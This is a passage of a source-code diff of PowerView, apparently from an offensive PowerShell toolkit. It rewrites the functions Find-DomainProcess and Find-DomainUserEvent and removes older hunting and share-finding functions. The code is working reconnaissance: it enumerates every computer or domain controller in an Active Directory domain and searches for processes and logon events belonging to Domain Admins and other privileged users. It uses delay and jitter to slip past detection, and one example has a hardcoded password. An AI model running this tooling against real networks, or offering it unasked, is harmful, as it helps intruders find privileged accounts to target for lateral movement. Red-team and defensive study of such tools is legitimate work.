kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } } } -function Invoke-EventHunter { +function Find-DomainProcess { <# - .SYNOPSIS +.SYNOPSIS + +Searches for processes on the domain using WMI, returning processes +that match a particular user specification or process name. + +Thanks to @paulbrandau for the approach idea. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and queries the domain for users of a specified group +(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the +function enumerates any current processes running with Get-WMIProcess, +searching for processes running under any target user contexts or with the +specified -ProcessName. If -Credential is passed, it is passed through to +the underlying WMI commands used to enumerate the remote machines. + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER Domain + +Specifies the domain to query for computers AND users, defaults to the current domain. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER ComputerUnconstrained + +Switch. Search computer objects that have unconstrained delegation. + +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. - Queries all domain controllers on the network for account - logon events (ID 4624) and TGT request events (ID 4768), - searching for target users. +.PARAMETER ComputerServicePack - Note: Domain Admin (or equiv) rights are needed to query - this information from the DCs. +Search computers with a specific service pack, wildcards accepted. - Author: @sixdub, @harmj0y - License: BSD 3-Clause +.PARAMETER ComputerSiteName - .PARAMETER ComputerName +Search computers in the specific AD Site name, wildcards accepted. - Host array to enumerate, passable on the pipeline. +.PARAMETER ProcessName - .PARAMETER ComputerFile +Search for processes with one or more specific names. - File of hostnames/IPs to search. +.PARAMETER UserIdentity - .PARAMETER ComputerFilter +Specifies one or more user identities to search for. - Host filter name to query AD for, wildcards accepted. +.PARAMETER UserDomain - .PARAMETER ComputerADSpath +Specifies the domain to query for users to search for, defaults to the current domain. - The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +.PARAMETER UserLDAPFilter - .PARAMETER GroupName +Specifies an LDAP query string that is used to search for target users. - Group name to query for target users. +.PARAMETER UserSearchBase - .PARAMETER TargetServer +Specifies the LDAP source to search through for target users. +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. - Hunt for users who are effective local admins on a target server. +.PARAMETER UserGroupIdentity - .PARAMETER UserName +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. - Specific username to search for. +.PARAMETER UserAdminCount - .PARAMETER UserFilter +Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged). - A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)" +.PARAMETER Server - .PARAMETER UserADSpath +Specifies an Active Directory server (domain controller) to bind to. - The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +.PARAMETER SearchScope - .PARAMETER UserFile +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). - File of usernames to search for. +.PARAMETER ResultPageSize - .PARAMETER NoPing +Specifies the PageSize to set for the LDAP searcher object. - Don't ping each host to ensure it's up before enumerating. +.PARAMETER ServerTimeLimit - .PARAMETER Domain +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - Domain for query for machines, defaults to the current domain. +.PARAMETER Tombstone - .PARAMETER DomainController +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - Domain controller to reflect LDAP queries through. +.PARAMETER Credential - .PARAMETER SearchDays +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. - Number of days back to search logs for. Default 3. +.PARAMETER StopOnSuccess - .PARAMETER SearchForest +Switch. Stop hunting after finding after finding a target user. - Switch. Search all domains in the forest for target users instead of just - a single domain. +.PARAMETER Delay - .PARAMETER Threads +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. - The maximum concurrent threads to execute. +.PARAMETER Jitter - .PARAMETER Credential +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.PARAMETER Threads - .EXAMPLE +The number of threads to use for user searching, defaults to 20. - PS C:\> Invoke-EventHunter +.EXAMPLE - .LINK +Find-DomainProcess - http://blog.harmj0y.net +Searches for processes run by 'Domain Admins' by enumerating every computer in the domain. + +.EXAMPLE + +Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local + +Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by +privileged users in dev.testlab.local. + +.EXAMPLE + +Find-DomainProcess -ProcessName putty.exe + +Searchings for instances of putty.exe running on the current domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainProcess -Domain testlab.local -Credential $Cred + +Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials. + +.OUTPUTS + +PowerView.UserProcess #> - [CmdletBinding()] - param( - [Parameter(Position=0,ValueFromPipeline=$True)] - [Alias('Hosts')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] + [OutputType('PowerView.UserProcess')] + [CmdletBinding(DefaultParameterSetName = 'None')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] [String[]] $ComputerName, - [ValidateScript({Test-Path -Path $_ })] - [Alias('HostList')] + [ValidateNotNullOrEmpty()] [String] - $ComputerFile, + $Domain, + [ValidateNotNullOrEmpty()] [String] - $ComputerFilter, + $ComputerDomain, + [ValidateNotNullOrEmpty()] [String] - $ComputerADSpath, + $ComputerLDAPFilter, + [ValidateNotNullOrEmpty()] [String] - $GroupName = 'Domain Admins', + $ComputerSearchBase, - [String] - $TargetServer, + [Alias('Unconstrained')] + [Switch] + $ComputerUnconstrained, - [String[]] - $UserName, + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] [String] - $UserFilter, + $ComputerServicePack, + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] [String] - $UserADSpath, + $ComputerSiteName, + + [Parameter(ParameterSetName = 'TargetProcess')] + [ValidateNotNullOrEmpty()] + [String[]] + $ProcessName, + + [Parameter(ParameterSetName = 'TargetUser')] + [Parameter(ParameterSetName = 'UserIdentity')] + [ValidateNotNullOrEmpty()] + [String[]] + $UserIdentity, - [ValidateScript({Test-Path -Path $_ })] + [Parameter(ParameterSetName = 'TargetUser')] + [ValidateNotNullOrEmpty()] [String] - $UserFile, + $UserDomain, + [Parameter(ParameterSetName = 'TargetUser')] + [ValidateNotNullOrEmpty()] [String] - $Domain, + $UserLDAPFilter, + [Parameter(ParameterSetName = 'TargetUser')] + [ValidateNotNullOrEmpty()] [String] - $DomainController, + $UserSearchBase, - [Int32] - $SearchDays = 3, + [ValidateNotNullOrEmpty()] + [Alias('GroupName', 'Group')] + [String[]] + $UserGroupIdentity = 'Domain Admins', + [Parameter(ParameterSetName = 'TargetUser')] + [Alias('AdminCount')] [Switch] - $SearchForest, - - [ValidateRange(1,100)] - [Int] - $Threads, + $UserAdminCount, - [Management.Automation.PSCredential] - $Credential - ) - - begin { + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, - if ($PSBoundParameters['Debug']) { - $DebugPreference = 'Continue' - } + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', - # random object for delay - $RandNo = New-Object System.Random + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, - Write-Verbose "[*] Running Invoke-EventHunter" + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, - if($Domain) { - $TargetDomains = @($Domain) - } - elseif($SearchForest) { - # get ALL the domains in the forest to search - $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } - } - else { - # use the local domain - $TargetDomains = @( (Get-NetDomain -Credential $Credential).name ) - } + [Switch] + $Tombstone, - ##################################################### - # - # First we build the host target set - # - ##################################################### + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, - if(!$ComputerName) { - # if we're using a host list, read the targets in and add them to the target list - if($ComputerFile) { - $ComputerName = Get-Content -Path $ComputerFile - } - elseif($ComputerFilter -or $ComputerADSpath) { - [array]$ComputerName = @() - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for hosts" - $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter $ComputerFilter -ADSpath $ComputerADSpath - } - } - else { - # if a computer specifier isn't given, try to enumerate all domain controllers - [array]$ComputerName = @() - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for domain controllers" - $ComputerName += Get-NetDomainController -LDAP -Domain $Domain -DomainController $DomainController -Credential $Credential | ForEach-Object { $_.dnshostname} - } - } + [Switch] + $StopOnSuccess, - # remove any null target hosts, uniquify the list and shuffle it - $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } - if($($ComputerName.Count) -eq 0) { - throw "No hosts found!" - } - } + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, - ##################################################### - # - # Now we build the user target set - # - ##################################################### + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, - # users we're going to be searching for - $TargetUsers = @() + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) - # if we want to hunt for the effective domain users who can access a target server - if($TargetServer) { - Write-Verbose "Querying target server '$TargetServer' for local users" - $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object { - ($_.AccountName).split("/")[1].toLower() - } | Where-Object {$_} + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + $UserSearcherArguments = @{ + 'Properties' = 'samaccountname' + } + if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity } + if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter } + if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount } + if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } + + + # first, build the set of computers to enumerate + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName } - # if we get a specific username, only use that - elseif($UserName) { - # Write-Verbose "[*] Using target user '$UserName'..." - $TargetUsers = $UserName | ForEach-Object {$_.ToLower()} - if($TargetUsers -isnot [System.Array]) { - $TargetUsers = @($TargetUsers) - } + else { + Write-Verbose '[Find-DomainProcess] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname } - # read in a target user list if we have one - elseif($UserFile) { - $TargetUsers = Get-Content -Path $UserFile | Where-Object {$_} + Write-Verbose "[Find-DomainProcess] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainProcess] No hosts found to enumerate' } - elseif($UserADSpath -or $UserFilter) { - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for users" - $TargetUsers += Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $UserADSpath -Filter $UserFilter | ForEach-Object { - $_.samaccountname - } | Where-Object {$_} + + # now build the user target set + if ($PSBoundParameters['ProcessName']) { + $TargetProcessName = @() + ForEach ($T in $ProcessName) { + $TargetProcessName += $T.Split(',') } - } - else { - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'" - $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController -Credential $Credential | ForEach-Object { - $_.MemberName - } + if ($TargetProcessName -isnot [System.Array]) { + $TargetProcessName = [String[]] @($TargetProcessName) } } - - if (((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) { - throw "[!] No users found to search for!" + elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) { + $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname } - - # script block that enumerates a server + else { + $GroupSearcherArguments = @{ + 'Identity' = $UserGroupIdentity + 'Recurse' = $True + } + if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential } + $GroupSearcherArguments + $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName + } + + # the host enumeration block we're using to enumerate all servers $HostEnumBlock = { - param($ComputerName, $Ping, $TargetUsers, $SearchDays, $Credential) - - # optionally check if the server is up first - $Up = $True - if($Ping) { - $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName - } - if($Up) { - # try to enumerate - if($Credential) { - Get-UserEvent -ComputerName $ComputerName -Credential $Credential -EventType 'all' -DateStart ([DateTime]::Today.AddDays(-$SearchDays)) | Where-Object { - # filter for the target user set - $TargetUsers -contains $_.UserName + Param($ComputerName, $ProcessName, $TargetUsers, $Credential) + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # try to enumerate all active processes on the remote host + # and search for a specific process name + if ($Credential) { + $Processes = Get-WMIProcess -Credential $Credential -ComputerName $TargetComputer -ErrorAction SilentlyContinue } - } - else { - Get-UserEvent -ComputerName $ComputerName -EventType 'all' -DateStart ([DateTime]::Today.AddDays(-$SearchDays)) | Where-Object { - # filter for the target user set - $TargetUsers -contains $_.UserName + else { + $Processes = Get-WMIProcess -ComputerName $TargetComputer -ErrorAction SilentlyContinue + } + ForEach ($Process in $Processes) { + # if we're hunting for a process name or comma-separated names + if ($ProcessName) { + if ($ProcessName -Contains $Process.ProcessName) { + $Process + } + } + # if the session user is in the target list, display some output + elseif ($TargetUsers -Contains $Process.User) { + $Process + } } } } } - } - process { + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-DomainProcess] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainProcess] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) - if($Threads) { - Write-Verbose "Using threading with threads = $Threads" + Write-Verbose "[Find-DomainProcess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetProcessName, $TargetUsers, $Credential + $Result + + if ($Result -and $StopOnSuccess) { + Write-Verbose "[Find-DomainProcess] Target user found, returning early" + return + } + } + } + else { + Write-Verbose "[Find-DomainProcess] Using threading with threads: $Threads" - # if we're using threading, kick off the script block with Invoke-ThreadedFunction + # if we're using threading, kick off the script block with New-ThreadedFunction $ScriptParams = @{ - 'Ping' = $(-not $NoPing) + 'ProcessName' = $TargetProcessName 'TargetUsers' = $TargetUsers - 'SearchDays' = $SearchDays 'Credential' = $Credential } - # kick off the threaded script block + arguments - Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } + } +} - else { - if(-not $NoPing -and ($ComputerName.count -ne 1)) { - # ping all hosts in parallel - $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} - $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 - } - Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" - $Counter = 0 +function Find-DomainUserEvent { +<# +.SYNOPSIS - ForEach ($Computer in $ComputerName) { +Finds logon events on the current (or remote domain) for the specified users. - $Counter = $Counter + 1 +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction - # sleep for our semi-randomized interval - Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) +.DESCRIPTION - Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" - Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $(-not $NoPing), $TargetUsers, $SearchDays, $Credential - } - } +Enumerates all domain controllers from the specified -Domain +(default of the local domain) using Get-DomainController, enumerates +the logon events for each using Get-DomainUserEvent, and filters +the results based on the targeting criteria. + +.PARAMETER ComputerName + +Specifies an explicit computer name to retrieve events from. + +.PARAMETER Domain + +Specifies a domain to query for domain controllers to enumerate. +Defaults to the current domain. + +.PARAMETER Filter + +A hashtable of PowerView.LogonEvent properties to filter for. +The 'op|operator|operation' clause can have '&', '|', 'and', or 'or', +and is 'or' by default, meaning at least one clause matches instead of all. +See the exaples for usage. + +.PARAMETER StartTime + +The [DateTime] object representing the start of when to collect events. +Default of [DateTime]::Now.AddDays(-1). + +.PARAMETER EndTime + +The [DateTime] object representing the end of when to collect events. +Default of [DateTime]::Now. - } -} +.PARAMETER MaxEvents +The maximum number of events (per host) to retrieve. Default of 5000. -function Invoke-ShareFinder { -<# - .SYNOPSIS +.PARAMETER UserIdentity + +Specifies one or more user identities to search for. - This function finds the local domain name for a host using Get-NetDomain, - queries the domain for all active machines with Get-NetComputer, then for - each server it lists of active shares with Get-NetShare. Non-standard shares - can be filtered out with -Exclude* flags. +.PARAMETER UserDomain - Author: @harmj0y - License: BSD 3-Clause +Specifies the domain to query for users to search for, defaults to the current domain. - .PARAMETER ComputerName +.PARAMETER UserLDAPFilter - Host array to enumerate, passable on the pipeline. +Specifies an LDAP query string that is used to search for target users. - .PARAMETER ComputerFile +.PARAMETER UserSearchBase - File of hostnames/IPs to search. +Specifies the LDAP source to search through for target users. +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. - .PARAMETER ComputerFilter +.PARAMETER UserGroupIdentity - Host filter name to query AD for, wildcards accepted. +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. - .PARAMETER ComputerADSpath +.PARAMETER UserAdminCount - The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged). - .PARAMETER ExcludeStandard +.PARAMETER Server - Switch. Exclude standard shares from display (C$, IPC$, print$ etc.) +Specifies an Active Directory server (domain controller) to bind to. - .PARAMETER ExcludePrint +.PARAMETER SearchScope - Switch. Exclude the print$ share. +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). - .PARAMETER ExcludeIPC +.PARAMETER ResultPageSize - Switch. Exclude the IPC$ share. +Specifies the PageSize to set for the LDAP searcher object. - .PARAMETER CheckShareAccess +.PARAMETER ServerTimeLimit - Switch. Only display found shares that the local user has access to. +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - .PARAMETER CheckAdmin +.PARAMETER Tombstone - Switch. Only display ADMIN$ shares the local user has access to. +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - .PARAMETER NoPing +.PARAMETER Credential - Switch. Don't ping each host to ensure it's up before enumerating. +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target computer(s). - .PARAMETER Delay +.PARAMETER StopOnSuccess - Delay between enumerating hosts, defaults to 0. +Switch. Stop hunting after finding after finding a target user. - .PARAMETER Jitter +.PARAMETER Delay - Jitter for the host delay, defaults to +/- 0.3. +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. - .PARAMETER Domain +.PARAMETER Jitter - Domain to query for machines, defaults to the current domain. +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 - .PARAMETER DomainController +.PARAMETER Threads - Domain controller to reflect LDAP queries through. +The number of threads to use for user searching, defaults to 20. - .PARAMETER SearchForest +.EXAMPLE - Switch. Search all domains in the forest for target users instead of just - a single domain. +Find-DomainUserEvent - .PARAMETER Threads +Search for any user events matching domain admins on every DC in the current domain. - The maximum concurrent threads to execute. +.EXAMPLE - .EXAMPLE +$cred = Get-Credential dev\administrator +Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john' - PS C:\> Invoke-ShareFinder -ExcludeStandard +Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local' +domain controller using the alternate credential - Find non-standard shares on the domain. +.EXAMPLE - .EXAMPLE +'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'} - PS C:\> Invoke-ShareFinder -Threads 20 +Find user events on the primary.testlab.local system where the event matches +the IPAddress '192.168.52.200' or '192.168.52.201'. - Multi-threaded share finding, replaces Invoke-ShareFinderThreaded. +.EXAMPLE - .EXAMPLE +$cred = Get-Credential testlab\administrator +Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'} - PS C:\> Invoke-ShareFinder -Delay 60 +Find user events mathing the specified GUID AND the specified TargetLogonId, searching +through every domain controller in the current domain, enumerating each DC in serial +instead of in a threaded manner, using the alternate credential. - Find shares on the domain with a 60 second (+/- *.3) - randomized delay between touching each host. +.OUTPUTS - .EXAMPLE +PowerView.LogonEvent - PS C:\> Invoke-ShareFinder -ComputerFile hosts.txt +PowerView.ExplicitCredentialLogon - Find shares for machines in the specified hosts file. +.LINK - .LINK - http://blog.harmj0y.net +http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/ #> - [CmdletBinding()] - param( - [Parameter(Position=0,ValueFromPipeline=$True)] - [Alias('Hosts')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] + [OutputType('PowerView.LogonEvent')] + [OutputType('PowerView.ExplicitCredentialLogon')] + [CmdletBinding(DefaultParameterSetName = 'Domain')] + Param( + [Parameter(ParameterSetName = 'ComputerName', Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('dnshostname', 'HostName', 'name')] + [ValidateNotNullOrEmpty()] [String[]] $ComputerName, - [ValidateScript({Test-Path -Path $_ })] - [Alias('HostList')] + [Parameter(ParameterSetName = 'Domain')] + [ValidateNotNullOrEmpty()] [String] - $ComputerFile, + $Domain, + + [ValidateNotNullOrEmpty()] + [Hashtable] + $Filter, + + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [DateTime] + $StartTime = [DateTime]::Now.AddDays(-1), + + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [DateTime] + $EndTime = [DateTime]::Now, + + [ValidateRange(1, 1000000)] + [Int] + $MaxEvents = 5000, + + [ValidateNotNullOrEmpty()] + [String[]] + $UserIdentity, + [ValidateNotNullOrEmpty()] [String] - $ComputerFilter, + $UserDomain, + [ValidateNotNullOrEmpty()] [String] - $ComputerADSpath, + $UserLDAPFilter, - [Switch] - $ExcludeStandard, + [ValidateNotNullOrEmpty()] + [String] + $UserSearchBase, - [Switch] - $ExcludePrint, + [ValidateNotNullOrEmpty()] + [Alias('GroupName', 'Group')] + [String[]] + $UserGroupIdentity = 'Domain Admins', + [Alias('AdminCount')] [Switch] - $ExcludeIPC, + $UserAdminCount, [Switch] - $NoPing, + $CheckAccess, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, [Switch] - $CheckShareAccess, + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, [Switch] - $CheckAdmin, + $StopOnSuccess, - [UInt32] + [ValidateRange(1, 10000)] + [Int] $Delay = 0, + [ValidateRange(0.0, 1.0)] [Double] $Jitter = .3, - [String] - $Domain, - - [String] - $DomainController, - - [Switch] - $SearchForest, - - [ValidateRange(1,100)] [Int] - $Threads + [ValidateRange(1, 100)] + $Threads = 20 ) - begin { - if ($PSBoundParameters['Debug']) { - $DebugPreference = 'Continue' - } - - # random object for delay - $RandNo = New-Object System.Random - - Write-Verbose "[*] Running Invoke-ShareFinder with delay of $Delay" - - # figure out the shares we want to ignore - [String[]] $ExcludedShares = @('') - - if ($ExcludePrint) { - $ExcludedShares = $ExcludedShares + "PRINT$" + BEGIN { + $UserSearcherArguments = @{ + 'Properties' = 'samaccountname' + } + if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity } + if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter } + if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = 